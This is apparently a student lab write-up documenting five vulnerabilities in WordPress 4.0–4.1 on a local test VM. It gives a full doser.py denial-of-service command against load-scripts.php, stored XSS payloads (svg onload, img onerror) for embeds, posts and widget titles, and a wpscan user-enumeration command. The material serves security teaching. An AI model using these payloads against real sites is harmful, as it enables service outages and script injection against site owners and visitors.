Time spent: 12 hours spent in total
Objective: Find, analyze, recreate, and document five vulnerabilities affecting an old version of WordPress
- (Required) Application Denial of Service (DoS) (unpatched)
- Summary: In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
- Vulnerability types: Denial of Service (DoS)
- Tested in version: 4.1
- Fixed in version: unpatched
- GIF Walkthrough:
- Steps to recreate: In command line, command doser (link down below) to attack the target WP website. EX:
python doser.py -g 'http://wpdistillery.vm/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.1' -t 9999 - Affected source code:
- (Required) Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
- Summary: Vulnerability that makes it possible for a remote attacker to deface a random post on the site and store malicious Javascript code in it. This code would be executed when visitors view the post and when anyone edits the post from the WordPress dashboard.
- Vulnerability types: Stored Cross-site Scripting
- Tested in version: 4.1
- Fixed in version: View Versions
- GIF Walkthrough:
- Steps to recreate:
- Login to WP as admin.
- Create new post with the youtube embed
[embed src='https://youtube.com/embed/123\x3csvg onload=alert(1)\x3e'][/embed] - View the post.
- Affected source code:
- (Required) Authenticated Stored Cross-Site Scripting in New Post Creation
- Summary: Simple Cross-Site Scripting upon post creation which can lead to external script execution, cross site request forgery attacks, and remote command execution attacks.
- Vulnerability types: XSS
- Tested in version: 4.1
- Fixed in version: View versions
- GIF Walkthrough:
- Steps to recreate: When logged in as admin, creator, or editor, create/edit post with the content containing the malicious code, e.g
<img src=1 onerror=alert(1)> - Affected source code:
- (Optional) Widgets Title Cross-Site Scripting (XSS)
- Summary: XSS vulnerability on test widget functionality in sidebar.
- Vulnerability types: XSS
- Tested in version: 4.0
- Fixed in version: View versions
- GIF Walkthrough:
- Steps to recreate: When login in as admin, from the dashboard, navigate to Appearance > customize > Widgets. Then add a text widget to the primary sidebar with a title and content with malicious code. E.g
<img src="example.com" onerror="alert('xss');"> - Affected source code:
- (Optional) User enumeration at user login
- Summary: Wordpress wp-login.php endpoint does not correctly hinder the fact that a username was found in its database, therefore user enumeration is possible.
- Vulnerability types: User enumeration
- Tested in version: 4.1
- Fixed in version: unpatched
- GIF Walkthrough:
- Steps to recreate: At the command line, with wpscan installed, run "wpscan --url [WORDPRESS_BASE_URL] --enumerate u"
- Affected source code:
GIFs created with LiceCap.
Lots of trial and error with different vulnerabilities and wordpress versions. Explored more complex vulnerabilities, but sometimes POC would not work. Took my time to read about vulnerability articles.
Copyright 2018 Jose A. Guerrero
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.